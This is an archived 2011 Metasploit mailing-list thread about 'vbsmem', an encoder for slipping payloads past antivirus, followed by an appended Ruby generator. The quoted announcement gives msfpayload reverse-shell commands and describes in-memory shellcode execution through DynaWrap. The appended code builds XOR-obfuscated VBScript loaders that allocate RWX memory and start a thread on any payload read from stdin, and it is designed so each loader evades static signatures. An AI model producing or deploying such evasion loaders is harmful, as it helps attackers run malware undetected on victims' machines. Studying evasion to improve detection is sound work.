metasploit-framework March 2011 archive

Re: [framework] Additional encoder option 'vbsmem' for AV bypass

From: 5.K1dd <5.k1dd_at_nospam>
Date: Sat Mar 05 2011 - 15:35:11 GMT
To: framework@spool.metasploit.com

Nice! AV detection is the Achilles heel of Metasploit. Efforts to
bypass detection are always appreciated. Thanks, Blair. To the
Metasploit Gods: Will this script be added to svn?

>
> Hi,
>
> I've submitted a feature request with a patch included which implements
> a new VBScript-based encoder for msfencode.
>
> https://www.metasploit.com/redmine/issues/3894
>
> You might want to use this if you find that your payloads are getting
> picked up by certain on access virus scanners...
>
> Full details are available in the ticket and included below the jump.
>
> Feedback or suggestions welcome.
>
> Thanks,
>
> Blair.
>
> -----------------------------------------------------------------
>
> == SUMMARY ==
>
> * New exe encoder option for metasploit (Adds "-t vbsmem" to msfencode)
>
> * Achieves 0/43 (no detection) on virustotal.com for arbitrary
> metasploit shellcode payloads. Straight revshell is 20/43.
>
> * Uses vbscript with DynaWrap COM control (dropped and registered) to
> directly execute shellcode in memory, without triggering on-access virus
> scanners.
>
> * Standard VBScript string obfuscation techniques are used to hide the
> actual shellcode from AV software.
>
> == Examples ==
>
> Reverse shell
>
> ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.120.1
> LPORT=4444 R | ./msfencode -t vbsmem > revshell.vbs
>
> Pop calc poc
>
> ./msfpayload windows/exec EXITFUNC=process CMD='calc.exe' R |
> ./msfencode -t vbsmem > popcalc.vbs
>
> == About ==
>
> The first version of this encoder was written during a pentesting
> engagement. The target was running Microsoft Forefront Endpoint
> Protection with on-access scanning. It was possible to run commands,
> but I just couldn't get a meterpreter shell on there. After a
> frustrating session of multiply encoding, repacking and so on, the
> shellcode kept getting picked up.
>
> Existing VBScript payloads are not themselves picked up by AV, but
> when they drop files on the target, on-access scanning detects the
> payloads.
>
> After noting that the existing VBScript payloads themselves aren't
> picked up (just when they drop), I decided to apply a trick from
> Didier Stevens to execute the shellcode directly, without dropping.
> See:
>
> http://blog.didierstevens.com/2010/02/08/excel-with-cmd-dll-regedit-dll/
>
> This encoder writes shellcode into a vbscript file which performs
> the following actions:
>
> * Drops Dynawrap.dll in TEMP
> * Manually registers the control under HKEY_CURRENT_USER
> * Uses DynaWrap.dll to call native APIs...
> o VirtualAlloc (make space)
> o WriteProcessMemory (copy shellcode)
> o CreateThread (execute)
>
> Standard VBScript string obfuscation techniques are used to hide the
> actual shellcode from AV software.
>
> == Licensing ==
>
> The Dynawrap control was written by Ton Plooy and Jeff Strong and
> published in WDJ. As I understand it, this code is in the public
> domain and has been used in other open-source projects.
>
> The vbsmem code is provided under the same licensing terms as the
> metasploit project.
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>

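The announcement above describes the vbsmem output format only in outline (XOR-style string obfuscation of the shellcode, then VirtualAlloc / WriteProcessMemory / CreateThread through DynaWrap). What follows is an added example written for this archive page, not Blair's patch and not Metasploit code: a minimal msfencode-style generator in plain Ruby that hides the shellcode behind a random key and emits a VBScript loader, together with a Ruby-side reference decoder that reads the emitted script back so the round trip can be checked without a Windows host. The sample bytes are constructed (NOPs, an int3 and a ret, not a working payload), and the DynaWrap `Register` type strings and call sequence in the emitted script are assumptions of this example, not taken from the list posting.

```ruby
require 'securerandom'

# Constructed stand-in for shellcode (NOT a working payload): a NOP sled,
# an int3 and a ret, enough bytes to span two rows of the emitted array.
SAMPLE_SHELLCODE = ([0x90] * 16 + [0xcc, 0xc3, 0x90, 0x90]).pack('C*').freeze

IDENT_CHARS = (('a'..'z').to_a + ('0'..'9').to_a).freeze

# Random VBScript identifier so no two generated loaders share variable names.
def random_ident(len = 8)
  ('a'..'z').to_a.sample + Array.new(len - 1) { IDENT_CHARS.sample }.join
end

# Printable-ASCII key so Chr()/Asc() round-trip regardless of ANSI code page.
def random_key(len = 8)
  Array.new(len) { 0x21 + SecureRandom.random_number(0x5e) }.pack('C*')
end

# Repeating-key XOR; the same function encodes and decodes.
def xor_bytes(data, key)
  data.bytes.each_with_index.map { |b, i| b ^ key.getbyte(i % key.bytesize) }.pack('C*')
end

# Emit a VBScript loader. The shellcode never appears as a literal: the
# script carries XORed integers and rebuilds the bytes at run time.
def vbsmem_script(shellcode, key = random_key, per_line = 16)
  enc = xor_bytes(shellcode, key).bytes
  buf, k, i, s, dw, mem = Array.new(6) { random_ident }
  out = []
  out << "Dim #{buf}, #{k}, #{i}, #{s}, #{dw}, #{mem}"
  # Key built from Chr() pieces rather than stored as one literal string.
  out << "#{k} = " + key.bytes.map { |c| "Chr(#{c})" }.join(' & ')
  out << "#{buf} = Array( _"
  enc.each_slice(per_line) { |row| out << "  #{row.join(', ')}, _" }
  out[-1] = out[-1].sub(/, _\z/, ' _')          # last row: no trailing comma
  out << ')'
  # Decode loop: XOR each element with the key byte at the same offset.
  out << "#{s} = \"\""
  out << "For #{i} = 0 To UBound(#{buf})"
  out << "  #{s} = #{s} & Chr(#{buf}(#{i}) Xor Asc(Mid(#{k}, (#{i} Mod Len(#{k})) + 1, 1)))"
  out << 'Next'
  # In-memory execution via DynaWrap. The Register() type strings and the
  # argument order below are an ASSUMPTION of this example, not verified
  # against the DynaWrap control or the vbsmem patch.
  out << "Set #{dw} = CreateObject(\"DynamicWrapper\")"
  out << "#{dw}.Register \"kernel32.dll\", \"VirtualAlloc\", \"i=llll\", \"f=s\", \"r=l\""
  out << "#{dw}.Register \"kernel32.dll\", \"WriteProcessMemory\", \"i=llsll\", \"f=s\", \"r=l\""
  out << "#{dw}.Register \"kernel32.dll\", \"CreateThread\", \"i=llllll\", \"f=s\", \"r=l\""
  out << "#{mem} = #{dw}.VirtualAlloc(0, Len(#{s}), &H3000, &H40) ' MEM_COMMIT|MEM_RESERVE, RWX"
  out << "#{dw}.WriteProcessMemory -1, #{mem}, #{s}, Len(#{s}), 0  ' -1 = current process"
  out << "#{dw}.CreateThread 0, 0, #{mem}, 0, 0, 0"
  out.join("\r\n") + "\r\n"
end

# Reference decoder: reads the emitted script back the way the VBScript loop
# would (key from the Chr() pieces, bytes from the Array rows), so the round
# trip can be checked on any platform.
def recover_shellcode(script)
  key = script[/^\w+ = ((?:Chr\(\d+\)(?: & )?)+)\r?$/, 1].scan(/\d+/).map(&:to_i).pack('C*')
  rows = script[/Array\( _\r?\n(.*?)\r?\n\)/m, 1]
  xor_bytes(rows.scan(/\d+/).map(&:to_i).pack('C*'), key)
end

# The property a string-signature scanner cares about: the raw byte sequence,
# as it would be written in the array, is absent from the loader text.
def contains_literal?(script, shellcode)
  script.include?(shellcode.bytes.join(', '))
end

if __FILE__ == $PROGRAM_NAME
  # Usage mirrors the post's pipeline: raw payload on stdin, .vbs on stdout.
  payload = $stdin.tty? ? SAMPLE_SHELLCODE : $stdin.binmode.read
  $stdout.write(vbsmem_script(payload))
end
```

Two caveats a practitioner would want: the key bytes are kept in the printable range so that `Chr`/`Asc` round-trip on any ANSI code page, but the decoded shellcode itself is rebuilt with `Chr()` and handed to DynaWrap as an `s` (string) argument, and bytes above 0x7f on that path are code-page dependent in this illustration; and because the key is fresh per run, every generated loader differs, which is what keeps a static signature from matching the file rather than any property of the shellcode.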